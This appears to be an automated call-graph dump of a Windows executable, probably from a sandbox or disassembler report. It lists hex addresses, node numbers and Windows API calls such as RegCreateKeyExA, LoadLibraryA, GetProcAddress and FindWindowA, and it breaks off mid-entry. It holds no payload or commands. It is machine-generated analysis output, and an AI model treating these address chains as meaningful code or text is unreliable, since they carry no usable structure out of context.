1105c501 85002->85003 85004 1105c517 InitializeCriticalSection 85003->85004 87245 1105bfb0 266 API calls 3 library calls 85003->87245 85007 1105c557 85004->85007 85012 1105c5c6 85004->85012 87246 1105a5d0 287 API calls 3 library calls 85007->87246 85009 1105c578 RegCreateKeyExA 85010 1105c5d2 RegCreateKeyExA 85009->85010 85011 1105c59f RegCreateKeyExA 85009->85011 85010->85012 85013 1105c605 RegCreateKeyExA 85010->85013 85011->85010 85011->85012 85012->83958 85013->85012 85014->83976 85015->83979 85077 11131f26 85076->85077 85078 11131fe3 85077->85078 85083 1107c3b0 85077->85083 85078->84292 85080 11131f4b 85081 1107c3b0 IsDBCSLeadByte 85080->85081 85082 11131f7b _memmove 85081->85082 85082->84292 85084 1107c3bc 85083->85084 85086 1107c3c1 __mbschr_l std::locale::facet::_Facet_Register 85083->85086 85087 1107c2d0 IsDBCSLeadByte 85084->85087 85086->85080 85087->85086 85088->84297 85090 11133fb2 85089->85090 85094 11133fc9 std::locale::facet::_Facet_Register 85089->85094 85135 11027fb0 265 API calls 2 library calls 85090->85135 85093 11134157 85095 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 85093->85095 85094->85093 85096 11133ffc GetModuleFileNameA 85094->85096 85097 11134173 wsprintfA 85095->85097 85113 1107c480 85096->85113 85097->84306 85099 11134011 85100 11134021 SHGetFolderPathA 85099->85100 85112 11134108 85099->85112 85101 1113406d SHGetFolderPathA 85100->85101 85102 1113404e 85100->85102 85106 111340a2 std::locale::facet::_Facet_Register 85101->85106 85102->85101 85105 11134054 85102->85105 85103 11131740 std::locale::facet::_Facet_Register 262 API calls 85103->85093 85136 11027fb0 265 API calls 2 library calls 85105->85136 85109 11028fe0 std::locale::facet::_Facet_Register 145 API calls 85106->85109 85110 111340b3 85109->85110 85117 11133ac0 85110->85117 85112->85103 85114 1107c493 _strrchr 85113->85114 85116 1107c4aa std::locale::facet::_Facet_Register 85114->85116 85137 1107c2d0 IsDBCSLeadByte 85114->85137 85116->85099 85118 11133acb 85117->85118 85119 11133b4a 85117->85119 85118->85119 85120 11133adb GetFileAttributesA 85118->85120 85119->85112 85121 11133ae7 85120->85121 85122 11133af5 85120->85122 85121->85112 85123 11153ff7 __strdup 66 API calls 85122->85123 85124 11133afc 85123->85124 85125 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 85124->85125 85126 11133b06 85125->85126 85127 11133ac0 std::locale::facet::_Facet_Register 67 API calls 85126->85127 85133 11133b23 85126->85133 85128 11133b16 85127->85128 85129 11133b1e 85128->85129 85130 11133b2c 85128->85130 85131 11151665 _free 66 API calls 85129->85131 85132 11151665 _free 66 API calls 85130->85132 85131->85133 85134 11133b31 CreateDirectoryA 85132->85134 85133->85112 85134->85133 85137->85116 87242->84969 87243->84971 87244->84976 87245->85004 87246->85009 87284 1112caf0 87285 1112caf9 87284->87285 87286 1112cafe 87284->87286 87288 11129d80 87285->87288 87289 11129db7 87288->87289 87290 11129dbc 87288->87290 87395 11027e90 87289->87395 87402 111251e0 87290->87402 87296 11129ead 87301 11129ede FindWindowA 87296->87301 87307 11129f76 87296->87307 87297 1112a2e4 87299 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87297->87299 87302 1112a2fc 87299->87302 87300 11129df8 IsWindow IsWindowVisible 87303 111356e0 std::locale::facet::_Facet_Register 21 API calls 87300->87303 87304 11129ef3 IsWindowVisible 87301->87304 87301->87307 87302->87286 87305 11129e23 87303->87305 87306 11129efa 87304->87306 87304->87307 87309 11059580 79 API calls 87305->87309 87306->87307 87314 11129920 379 API calls 87306->87314 87310 11059580 79 API calls 87307->87310 87315 11129f99 87307->87315 87308 1112a149 87313 1112a163 87308->87313 87318 11129920 379 API calls 87308->87318 87312 11129e3f IsWindowVisible 87309->87312 87332 11129fc1 87310->87332 87311 11059580 79 API calls 87316 1112a136 87311->87316 87312->87296 87317 11129e4d 87312->87317 87320 1112a180 87313->87320 87630 11066c70 300 API calls 87313->87630 87319 11129f1b IsWindowVisible 87314->87319 87315->87308 87315->87311 87316->87308 87323 1112a13b 87316->87323 87317->87296 87324 11129e55 87317->87324 87318->87313 87319->87307 87325 11129f2a IsIconic 87319->87325 87631 1111e690 12 API calls 2 library calls 87320->87631 87629 1102b9a0 294 API calls std::locale::facet::_Facet_Register 87323->87629 87329 111356e0 std::locale::facet::_Facet_Register 21 API calls 87324->87329 87325->87307 87326 11129f3b GetForegroundWindow 87325->87326 87627 111228e0 ShowWindow 87326->87627 87327 1112a185 87333 1112a196 87327->87333 87334 1112a18d 87327->87334 87336 11129e5f GetForegroundWindow 87329->87336 87331 1112a00e 87340 11132680 std::locale::facet::_Facet_Register 8 API calls 87331->87340 87332->87315 87332->87331 87338 1107c3b0 IsDBCSLeadByte 87332->87338 87341 1112a1a0 87333->87341 87342 1112a1ac 87333->87342 87632 11123160 89 API calls 3 library calls 87334->87632 87335 1112a144 87335->87308 87343 11129e9a 87336->87343 87344 11129e6e EnableWindow 87336->87344 87337 11129f4a 87628 111228e0 ShowWindow 87337->87628 87338->87331 87347 1112a020 87340->87347 87348 1112a1b1 87341->87348 87633 11122f00 300 API calls 87341->87633 87634 11122e30 301 API calls std::locale::facet::_Facet_Register 87342->87634 87343->87296 87352 11129ea6 SetForegroundWindow 87343->87352 87625 111228e0 ShowWindow 87344->87625 87346 1112a193 87346->87333 87353 1112a02d GetLastError 87347->87353 87369 1112a03b 87347->87369 87355 1112a2a8 87348->87355 87356 1112a1aa 87348->87356 87351 11129f51 87362 11129f67 EnableWindow 87351->87362 87365 11129f60 SetForegroundWindow 87351->87365 87352->87296 87363 111356e0 std::locale::facet::_Facet_Register 21 API calls 87353->87363 87358 11129720 291 API calls 87355->87358 87356->87348 87359 1112a260 87356->87359 87360 1112a1c9 87356->87360 87357 11129e85 87626 111228e0 ShowWindow 87357->87626 87376 1112a2ad 87358->87376 87359->87355 87640 1103db30 68 API calls 87359->87640 87360->87355 87370 11102870 std::locale::facet::_Facet_Register 265 API calls 87360->87370 87362->87307 87363->87369 87364 11129e8c EnableWindow 87364->87343 87365->87362 87366 1112a2d4 87366->87297 87368 1112a08c 87374 11132680 std::locale::facet::_Facet_Register 8 API calls 87368->87374 87369->87315 87369->87368 87372 1107c3b0 IsDBCSLeadByte 87369->87372 87373 1112a1ea 87370->87373 87371 1112a26f 87641 1103dbb0 68 API calls 87371->87641 87372->87368 87377 1112a20e 87373->87377 87635 11052f90 306 API calls std::locale::facet::_Facet_Register 87373->87635 87378 1112a09e 87374->87378 87376->87366 87541 111316c0 87376->87541 87636 1103daf0 699 API calls 87377->87636 87378->87315 87382 1112a0a5 GetLastError 87378->87382 87379 1112a27a 87642 1103dbd0 68 API calls 87379->87642 87384 111356e0 std::locale::facet::_Facet_Register 21 API calls 87382->87384 87384->87315 87385 1112a285 87643 1103db90 68 API calls 87385->87643 87388 1112a233 87637 11045a30 699 API calls 87388->87637 87390 1112a23e 87638 11045aa0 699 API calls 87390->87638 87392 1112a249 87639 1103db50 699 API calls 87392->87639 87394 1112a254 87394->87355 87644 11025f80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 87395->87644 87397 11027eb3 87646 11084500 269 API calls 2 library calls 87397->87646 87400 11027e9e 87400->87397 87645 11025f80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 87400->87645 87401 11027ebe 87401->87290 87403 11125222 87402->87403 87404 11125553 87402->87404 87405 11059580 79 API calls 87403->87405 87406 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87404->87406 87407 11125242 87405->87407 87408 1112556b 87406->87408 87407->87404 87409 1112524a LoadLibraryA 87407->87409 87442 11124cc0 87408->87442 87647 110098c0 LoadLibraryA 87409->87647 87411 111252a0 LoadLibraryA GetCurrentProcess 87412 11125332 GetProcessHandleCount 87411->87412 87413 1112531a GetProcAddress 87411->87413 87415 11125346 GetProcAddress 87412->87415 87413->87412 87414 1112533e SetLastError 87413->87414 87414->87415 87416 11125371 SetLastError GetProcAddress 87415->87416 87417 1112535a 87415->87417 87418 111253a3 SetLastError 87416->87418 87419 11125396 87416->87419 87420 111253ae GetProcAddress 87417->87420 87418->87420 87419->87420 87421 111253c0 K32GetProcessMemoryInfo 87420->87421 87422 111253ce SetLastError 87420->87422 87423 111253d6 87421->87423 87422->87423 87424 1112544c 87423->87424 87425 111356e0 std::locale::facet::_Facet_Register 21 API calls 87423->87425 87426 11125529 87424->87426 87432 11059580 79 API calls 87424->87432 87425->87424 87427 11125539 FreeLibrary 87426->87427 87428 1112553c 87426->87428 87427->87428 87429 11125546 FreeLibrary 87428->87429 87430 11125549 87428->87430 87429->87430 87430->87404 87431 11125550 FreeLibrary 87430->87431 87431->87404 87433 1112549d 87432->87433 87434 11059580 79 API calls 87433->87434 87435 111254c5 87434->87435 87436 11059580 79 API calls 87435->87436 87437 111254ec 87436->87437 87438 11059580 79 API calls 87437->87438 87439 11125513 87438->87439 87439->87426 87440 11125524 87439->87440 87648 110264a0 265 API calls 2 library calls 87440->87648 87444 11124ced 87442->87444 87443 111251a9 87443->87296 87443->87297 87545 11129920 87443->87545 87444->87443 87445 110c6600 268 API calls 87444->87445 87446 11124d4e 87445->87446 87447 110c6600 268 API calls 87446->87447 87448 11124d59 87447->87448 87449 11124d87 87448->87449 87450 11124d9e 87448->87450 87649 11027fb0 265 API calls 2 library calls 87449->87649 87452 111356e0 std::locale::facet::_Facet_Register 21 API calls 87450->87452 87454 11124dac 87452->87454 87650 110c6390 265 API calls 87454->87650 87542 111316df 87541->87542 87543 111316ca 87541->87543 87542->87366 87651 11130d40 87543->87651 87546 11129d5f 87545->87546 87549 1112993d 87545->87549 87547 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87546->87547 87548 11129d6e 87547->87548 87548->87300 87549->87546 87550 11134460 std::locale::facet::_Facet_Register 90 API calls 87549->87550 87551 1112997c 87550->87551 87551->87546 87552 11059580 79 API calls 87551->87552 87553 111299ab 87552->87553 87785 1111e120 87553->87785 87555 11129af0 PostMessageA 87557 11129b05 87555->87557 87556 11059580 79 API calls 87558 11129aec 87556->87558 87559 11129b15 87557->87559 87794 111026c0 InterlockedDecrement 87557->87794 87558->87555 87558->87557 87561 11129b1b 87559->87561 87562 11129b3d 87559->87562 87565 11129b73 std::ios_base::_Tidy 87561->87565 87566 11129b8e 87561->87566 87795 11121b90 301 API calls std::locale::facet::_Facet_Register 87562->87795 87564 11129b45 87796 11135ec0 267 API calls 87564->87796 87574 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87565->87574 87569 111322d0 145 API calls 87566->87569 87571 11129b93 87569->87571 87570 11129b4f 87797 1111e320 SetDlgItemTextA 87570->87797 87572 11135ee0 269 API calls 87571->87572 87575 11129b9a SetWindowTextA 87572->87575 87577 11129b8a 87574->87577 87578 11129bb6 87575->87578 87586 11129bbd std::ios_base::_Tidy 87575->87586 87576 11129b60 std::ios_base::_Tidy 87576->87561 87577->87300 87798 111263d0 299 API calls 5 library calls 87578->87798 87579 11134e70 271 API calls 87581 11129a9b 87579->87581 87581->87555 87581->87556 87582 11129c14 87583 11129c28 87582->87583 87584 11129cec 87582->87584 87587 11129c4c 87583->87587 87801 111263d0 299 API calls 5 library calls 87583->87801 87589 11129d0d 87584->87589 87594 11129cfb 87584->87594 87595 11129cf4 87584->87595 87585 11129be7 87585->87582 87590 11129bfc 87585->87590 87586->87582 87586->87585 87799 111263d0 299 API calls 5 library calls 87586->87799 87803 110ecc70 86 API calls 87587->87803 87807 110ecc70 86 API calls 87589->87807 87800 111228e0 ShowWindow 87590->87800 87806 111228e0 ShowWindow 87594->87806 87805 111263d0 299 API calls 5 library calls 87595->87805 87597 11129c0c 87597->87582 87600 11129d18 87600->87546 87604 11129d1c IsWindowVisible 87600->87604 87601 11129c57 87601->87546 87605 11129c5f IsWindowVisible 87601->87605 87602 11129d0a 87602->87589 87603 11129c36 87603->87587 87607 11129c42 87603->87607 87604->87546 87608 11129d2e IsWindowVisible 87604->87608 87605->87546 87606 11129c76 87605->87606 87609 11134460 std::locale::facet::_Facet_Register 90 API calls 87606->87609 87802 111228e0 ShowWindow 87607->87802 87608->87546 87611 11129d3b EnableWindow 87608->87611 87612 11129c81 87609->87612 87808 111228e0 ShowWindow 87611->87808 87612->87546 87615 11129c8c GetForegroundWindow IsWindowVisible 87612->87615 87613 11129c49 87613->87587 87617 11129cb1 87615->87617 87618 11129ca6 EnableWindow 87615->87618 87616 11129d52 EnableWindow 87616->87546 87804 111228e0 ShowWindow 87617->87804 87618->87617 87620 11129cb8 87621 11129cce EnableWindow 87620->87621 87622 11129cc7 SetForegroundWindow 87620->87622 87623 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87621->87623 87622->87621 87624 11129ce8 87623->87624 87624->87300 87625->87357 87626->87364 87627->87337 87628->87351 87629->87335 87630->87320 87631->87327 87632->87346 87633->87356 87634->87348 87635->87377 87636->87388 87637->87390 87638->87392 87639->87394 87640->87371 87641->87379 87642->87385 87643->87394 87644->87400 87645->87400 87646->87401 87647->87411 87648->87426 87652 11130d7f 87651->87652 87705 11130d78 std::ios_base::_Tidy 87651->87705 87653 11102870 std::locale::facet::_Facet_Register 265 API calls 87652->87653 87654 11130d86 87653->87654 87657 11130db6 87654->87657 87658 1105c840 301 API calls 87654->87658 87655 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87656 111316b8 87655->87656 87656->87542 87659 1105cfc0 275 API calls 87657->87659 87658->87657 87660 11130df2 87659->87660 87661 11130df9 RegCloseKey 87660->87661 87662 11130e00 std::locale::facet::_Facet_Register 87660->87662 87661->87662 87663 11134180 267 API calls 87662->87663 87664 11130e1c 87663->87664 87665 11132680 std::locale::facet::_Facet_Register 8 API calls 87664->87665 87666 11130e30 87665->87666 87667 11130e47 87666->87667 87668 1105e620 330 API calls 87666->87668 87669 11102870 std::locale::facet::_Facet_Register 265 API calls 87667->87669 87668->87667 87670 11130e4e 87669->87670 87671 11130e6a 87670->87671 87672 1105c4b0 293 API calls 87670->87672 87673 11102870 std::locale::facet::_Facet_Register 265 API calls 87671->87673 87672->87671 87674 11130e83 87673->87674 87675 11130e9f 87674->87675 87676 1105c4b0 293 API calls 87674->87676 87677 11102870 std::locale::facet::_Facet_Register 265 API calls 87675->87677 87676->87675 87678 11130eb8 87677->87678 87679 11130ed4 87678->87679 87680 1105c4b0 293 API calls 87678->87680 87681 1105c030 268 API calls 87679->87681 87680->87679 87682 11130efd 87681->87682 87683 1105c030 268 API calls 87682->87683 87732 11130f17 87683->87732 87684 11131245 87686 11059580 79 API calls 87684->87686 87689 1113162d 87684->87689 87685 1105c0c0 274 API calls 87685->87732 87687 11131271 87686->87687 87688 111313be 87687->87688 87692 1105c030 268 API calls 87687->87692 87693 1105c810 274 API calls 87688->87693 87697 1105bf10 69 API calls 87689->87697 87690 11131235 87691 111356e0 std::locale::facet::_Facet_Register 21 API calls 87690->87691 87691->87684 87694 1113128f 87692->87694 87695 111313da 87693->87695 87698 1105c0c0 274 API calls 87694->87698 87776 11063210 300 API calls std::locale::facet::_Facet_Register 87695->87776 87696 111356e0 21 API calls std::locale::facet::_Facet_Register 87696->87732 87699 11131680 87697->87699 87706 1113129e 87698->87706 87700 1105bf10 69 API calls 87699->87700 87700->87705 87701 111312d3 87703 1105c030 268 API calls 87701->87703 87707 111312e9 87703->87707 87704 111356e0 std::locale::facet::_Facet_Register 21 API calls 87704->87706 87705->87655 87706->87701 87706->87704 87710 1105c0c0 274 API calls 87706->87710 87709 1105c0c0 274 API calls 87707->87709 87708 11131433 EnterCriticalSection 87779 1105bcf0 271 API calls 2 library calls 87708->87779 87726 111312f8 87709->87726 87710->87706 87713 11131451 87714 1105c810 274 API calls 87713->87714 87717 11131466 87714->87717 87715 11131403 87715->87708 87777 1104c600 365 API calls 4 library calls 87715->87777 87778 11063210 300 API calls std::locale::facet::_Facet_Register 87715->87778 87716 11131331 87718 1105c030 268 API calls 87716->87718 87719 1113147a LeaveCriticalSection 87717->87719 87780 110293b0 283 API calls 2 library calls 87717->87780 87720 11123050 86 API calls 87720->87732 87721 111356e0 std::locale::facet::_Facet_Register 21 API calls 87721->87726 87726->87716 87726->87721 87733 1105c0c0 274 API calls 87726->87733 87731 1107c4f0 86 API calls 87731->87732 87732->87684 87732->87685 87732->87690 87732->87696 87732->87720 87732->87731 87740 1107c5a0 86 API calls std::locale::facet::_Facet_Register 87732->87740 87733->87726 87740->87732 87776->87715 87777->87715 87778->87715 87779->87713 87786 1111e13c 87785->87786 87787 1111e177 87786->87787 87789 1111e164 87786->87789 87809 11066c70 300 API calls 87787->87809 87790 11135ee0 269 API calls 87789->87790 87791 1111e16f 87790->87791 87792 1111e1c3 87791->87792 87793 11131740 std::locale::facet::_Facet_Register 265 API calls 87791->87793 87792->87579 87792->87581 87793->87792 87794->87559 87795->87564 87796->87570 87797->87576 87798->87586 87799->87585 87800->87597 87801->87603 87802->87613 87803->87601 87804->87620 87805->87594 87806->87602 87807->87600 87808->87616 87809->87791 87810 11133650 87811 11133661 87810->87811 87824 11133070 87811->87824 87815 111336e5 87818 11133702 87815->87818 87820 111336e4 87815->87820 87816 111336ab 87817 111336b2 ResetEvent 87816->87817 87832 11133230 265 API calls 2 library calls 87817->87832 87820->87815 87833 11133230 265 API calls 2 library calls 87820->87833 87821 111336c6 SetEvent WaitForMultipleObjects 87821->87817 87821->87820 87823 111336ff 87823->87818 87825 1113307c GetCurrentProcess 87824->87825 87828 1113309f 87824->87828 87826 1113308d GetModuleFileNameA 87825->87826 87825->87828 87826->87828 87827 111330c9 WaitForMultipleObjects 87827->87815 87827->87816 87828->87827 87829 11102870 std::locale::facet::_Facet_Register 263 API calls 87828->87829 87830 111330bb 87829->87830 87830->87827 87834 111329c0 GetModuleFileNameA 87830->87834 87832->87821 87833->87823 87835 11132a43 87834->87835 87836 11132a03 87834->87836 87839 11132a69 GetModuleHandleA GetProcAddress 87835->87839 87840 11132a4f LoadLibraryA 87835->87840 87837 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 87836->87837 87838 11132a11 87837->87838 87838->87835 87841 11132a18 LoadLibraryA 87838->87841 87843 11132a97 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87839->87843 87844 11132a89 87839->87844 87840->87839 87842 11132a5e LoadLibraryA 87840->87842 87841->87835 87842->87839 87845 11132ac3 10 API calls 87843->87845 87844->87845 87846 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87845->87846 87847 11132b40 87846->87847 87847->87827 87848 1102ed27 87849 1102ed3a 87848->87849 87850 1102f3a0 87849->87850 87851 1102ed5e RegOpenKeyExA 87849->87851 87857 1102ee13 87849->87857 87852 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87850->87852 87853 1102ed86 87851->87853 87851->87857 87855 1102f512 87852->87855 87856 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 87853->87856 87854 1102ef17 87859 11102870 std::locale::facet::_Facet_Register 265 API calls 87854->87859 87860 1102edae 87856->87860 87863 1102ee89 GetModuleHandleA GetProcAddress 87857->87863 87872 1102ee37 87857->87872 87877 1102eeb3 87857->87877 87858 11102870 std::locale::facet::_Facet_Register 265 API calls 87861 1102ee59 87858->87861 87862 1102ef1e 87859->87862 87864 1102ee06 RegCloseKey 87860->87864 87866 11151867 std::locale::facet::_Facet_Register 79 API calls 87860->87866 87936 110fc270 87861->87936 87875 1102ee75 GetStockObject GetObjectA 87862->87875 88038 110eeb50 272 API calls std::locale::facet::_Facet_Register 87862->88038 87865 1102eea6 GetNativeSystemInfo 87863->87865 87863->87877 87864->87857 87865->87877 87869 1102edbe 87866->87869 88036 11152c8a 79 API calls __isdigit_l 87869->88036 87871 1102f0a7 SetErrorMode SetErrorMode 87879 11102870 std::locale::facet::_Facet_Register 265 API calls 87871->87879 87872->87858 87872->87875 87875->87871 87876 1102edcd 87878 1102ede6 87876->87878 88037 11152c8a 79 API calls __isdigit_l 87876->88037 87877->87854 87877->87872 87882 11151867 std::locale::facet::_Facet_Register 79 API calls 87878->87882 87881 1102f0e3 87879->87881 87985 11026ed0 87881->87985 87884 1102edf2 87882->87884 87884->87864 87885 1102f0fd 87886 11102870 std::locale::facet::_Facet_Register 265 API calls 87885->87886 87887 1102f123 87886->87887 87888 11026ed0 268 API calls 87887->87888 87889 1102f13d InterlockedExchange 87888->87889 87891 11102870 std::locale::facet::_Facet_Register 265 API calls 87889->87891 87892 1102f165 87891->87892 87988 11084cb0 87892->87988 87894 1102f17d GetACP 87999 11151b53 87894->87999 87898 11153e83 _setlocale 101 API calls 87899 1102f1ae 87898->87899 87900 11132000 86 API calls 87899->87900 87901 1102f1d4 87900->87901 87902 11102870 std::locale::facet::_Facet_Register 265 API calls 87901->87902 87903 1102f1f4 87902->87903 87904 1105c840 301 API calls 87903->87904 87906 1102f21f 87904->87906 87905 1102f26c 87907 11102870 std::locale::facet::_Facet_Register 265 API calls 87905->87907 87906->87905 87908 11102870 std::locale::facet::_Facet_Register 265 API calls 87906->87908 87909 1102f294 87907->87909 87910 1102f246 87908->87910 88010 11116a20 87909->88010 87910->87905 87912 1105c4b0 293 API calls 87910->87912 87912->87905 87937 11102870 std::locale::facet::_Facet_Register 265 API calls 87936->87937 87938 110fc2d1 87937->87938 87939 110fc2e9 OpenEventA 87938->87939 88045 110fa7d0 87938->88045 87942 110fc358 CloseHandle GetSystemDirectoryA 87939->87942 87943 110fc411 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 87939->87943 87945 110fc378 87942->87945 87944 11102870 std::locale::facet::_Facet_Register 265 API calls 87943->87944 87946 110fc463 87944->87946 87945->87945 87947 110fc380 LoadLibraryA 87945->87947 87948 110fc47c 87946->87948 88064 110e9520 268 API calls std::locale::facet::_Facet_Register 87946->88064 87947->87943 87949 110fc3b1 87947->87949 87952 11102700 423 API calls 87948->87952 87951 11134460 std::locale::facet::_Facet_Register 90 API calls 87949->87951 87953 110fc3bb 87951->87953 87954 110fc498 CloseHandle 87952->87954 87955 110fc3da GetProcAddress 87953->87955 87956 110fc3c2 GetProcAddress 87953->87956 87957 11096d20 12 API calls 87954->87957 87958 110fc3f6 87955->87958 87959 110fc404 FreeLibrary 87955->87959 87956->87955 87960 110fc4a4 87957->87960 87958->87943 87959->87943 87961 110fc58d 87960->87961 87963 11102870 std::locale::facet::_Facet_Register 265 API calls 87960->87963 87962 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87961->87962 87964 110fc5a7 87962->87964 87965 110fc4b3 87963->87965 87964->87875 87966 110fc4cd 87965->87966 87967 110fc4c4 87965->87967 87969 11102700 423 API calls 87966->87969 88065 110e9520 268 API calls std::locale::facet::_Facet_Register 87967->88065 87970 110fc4e9 CloseHandle 87969->87970 87971 11134460 std::locale::facet::_Facet_Register 90 API calls 87970->87971 87972 110fc4fa 87971->87972 87972->87961 87973 11102870 std::locale::facet::_Facet_Register 265 API calls 87972->87973 87974 110fc50c 87973->87974 87975 110fc526 87974->87975 88066 110e9520 268 API calls std::locale::facet::_Facet_Register 87974->88066 87977 11102700 423 API calls 87975->87977 87978 110fc542 CloseHandle 87977->87978 87979 11102870 std::locale::facet::_Facet_Register 265 API calls 87978->87979 87980 110fc550 87979->87980 87981 110fc56a 87980->87981 88067 110e9520 268 API calls std::locale::facet::_Facet_Register 87980->88067 87983 11102700 423 API calls 87981->87983 87984 110fc586 CloseHandle 87983->87984 87984->87961 87986 11083130 268 API calls 87985->87986 87987 11026edb _memset 87986->87987 87987->87885 87989 11102870 std::locale::facet::_Facet_Register 265 API calls 87988->87989 87990 11084ce7 87989->87990 87991 11102870 std::locale::facet::_Facet_Register 265 API calls 87990->87991 87995 11084d09 InitializeCriticalSection 87990->87995 87993 11084d02 87991->87993 87993->87995 88070 11150c1a 66 API calls std::exception::_Copy_str 87993->88070 87994 11084d6a 87994->87894 87995->87994 87997 11084d39 88071 11151071 RaiseException 87997->88071 88000 11151b86 87999->88000 88001 11151b71 87999->88001 88000->88001 88002 11151b8d 88000->88002 88072 11157ccf 66 API calls __getptd_noexit 88001->88072 88074 1115dd9b 102 API calls 11 library calls 88002->88074 88004 11151b76 88073 1115c8e4 11 API calls __close 88004->88073 88007 11151bb3 88008 1102f1a4 88007->88008 88075 1115dc04 97 API calls 6 library calls 88007->88075 88008->87898 88011 11102870 std::locale::facet::_Facet_Register 265 API calls 88010->88011 88012 11116a54 88011->88012 88013 11116a85 88012->88013 88014 11116a6a 88012->88014 88076 11115e30 88013->88076 88122 11070e20 460 API calls std::locale::facet::_Facet_Register 88014->88122 88016 11116a7a 88016->88013 88036->87876 88037->87876 88038->87875 88046 11102970 3 API calls 88045->88046 88047 110fa80c 88046->88047 88048 11102970 3 API calls 88047->88048 88049 110fa81c 88048->88049 88050 11102970 3 API calls 88049->88050 88051 110fa82e 88050->88051 88052 11102970 3 API calls 88051->88052 88053 110fa83f 88052->88053 88054 11102970 3 API calls 88053->88054 88055 110fa850 88054->88055 88056 11102870 std::locale::facet::_Facet_Register 265 API calls 88055->88056 88057 110fa861 88056->88057 88058 110fa86c LoadLibraryA LoadLibraryA 88057->88058 88059 110fa944 88057->88059 88058->87939 88068 11150c1a 66 API calls std::exception::_Copy_str 88059->88068 88061 110fa953 88069 11151071 RaiseException 88061->88069 88063 110fa968 88064->87948 88065->87966 88066->87975 88067->87981 88068->88061 88069->88063 88070->87997 88071->87995 88072->88004 88073->88008 88074->88007 88075->88008 88077 11115e91 InitializeCriticalSection 88076->88077 88079 11115ebe GetCurrentThreadId 88077->88079 88081 11115ef5 88079->88081 88082 11115efc 88079->88082 88156 111026b0 InterlockedIncrement 88081->88156 88124 1114e6e0 InterlockedIncrement 88082->88124 88085 11115f11 88086 11059580 79 API calls 88085->88086 88087 11115f49 88086->88087 88088 11102870 std::locale::facet::_Facet_Register 265 API calls 88087->88088 88094 11115f91 88087->88094 88090 11115f72 88088->88090 88089 11102870 std::locale::facet::_Facet_Register 265 API calls 88091 11115fb9 88089->88091 88092 111035c0 423 API calls 88090->88092 88090->88094 88095 11115fe3 88091->88095 88157 1100d190 439 API calls 88091->88157 88092->88094 88094->88089 88122->88016 88125 1114e6f7 88124->88125 88126 1114e6f2 88124->88126 88128 1114e71c SelectPalette SelectPalette 88125->88128 88129 1114e708 88125->88129 88161 1114e630 271 API calls std::locale::facet::_Facet_Register 88126->88161 88163 1114e320 265 API calls 88128->88163 88162 11027fb0 265 API calls 2 library calls 88129->88162 88133 1114e743 88164 1114e320 265 API calls 88133->88164 88135 1114e750 88136 1114e763 88135->88136 88137 1114e81e 88135->88137 88165 1114e2b0 265 API calls 2 library calls 88136->88165 88170 1114e320 265 API calls 88137->88170 88140 1114e82b 88142 1114e831 DeleteDC 88140->88142 88141 1114e76e 88143 1114e793 88141->88143 88144 1114e77d GetSystemPaletteEntries 88141->88144 88142->88085 88145 1114e7b6 88143->88145 88146 1114e79f 88143->88146 88144->88145 88167 1114e2b0 265 API calls 2 library calls 88145->88167 88166 11027fb0 265 API calls 2 library calls 88146->88166 88150 1114e7c2 _memmove 88168 11151c2b 66 API calls 2 library calls 88150->88168 88152 1114e7f1 88152->88142 88153 1114e7fb 88152->88153 88169 11027fb0 265 API calls 2 library calls 88153->88169 88156->88082 88157->88095 88161->88125 88163->88133 88164->88135 88165->88141 88167->88150 88168->88152 88170->88140 88172 11084280 88173 11102bc0 ___DllMainCRTStartup 4 API calls 88172->88173 88174 11084293 88173->88174 88175 1108429d 88174->88175 88184 11083a30 268 API calls std::locale::facet::_Facet_Register 88174->88184 88177 110842c4 88175->88177 88185 11083a30 268 API calls std::locale::facet::_Facet_Register 88175->88185 88180 110842d3 88177->88180 88181 11084250 88177->88181 88186 11083f80 88181->88186 88183 11084270 88183->88180 88184->88175 88185->88177 88219 11083240 6 API calls ___DllMainCRTStartup 88186->88219 88188 11083faf GetParent 88189 11083fca 88188->88189 88190 11083fbf 88188->88190 88192 11134180 267 API calls 88189->88192 88191 11083fc0 GetParent 88190->88191 88191->88189 88191->88191 88193 11083fd6 88192->88193 88194 111524d7 std::locale::facet::_Facet_Register 143 API calls 88193->88194 88195 11083fe3 std::ios_base::_Tidy 88194->88195 88196 11134180 267 API calls 88195->88196 88197 11083ff8 88196->88197 88198 111522a1 std::locale::facet::_Facet_Register 102 API calls 88197->88198 88199 1108400b std::locale::facet::_Facet_Register 88197->88199 88198->88199 88200 11028fe0 std::locale::facet::_Facet_Register 145 API calls 88199->88200 88210 1108402d std::ios_base::_Tidy 88199->88210 88201 1108405d 88200->88201 88202 11131740 std::locale::facet::_Facet_Register 265 API calls 88201->88202 88203 11084068 88202->88203 88204 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 88203->88204 88205 1108407c 88204->88205 88206 1107c4f0 86 API calls 88205->88206 88205->88210 88207 11084095 88206->88207 88208 1108409c 88207->88208 88209 110840dd 88207->88209 88220 110ae0c0 88208->88220 88212 1107c4f0 86 API calls 88209->88212 88210->88183 88214 110840eb 88212->88214 88214->88210 88215 110ae0c0 68 API calls 88214->88215 88217 110840f8 88215->88217 88216 110ae0c0 68 API 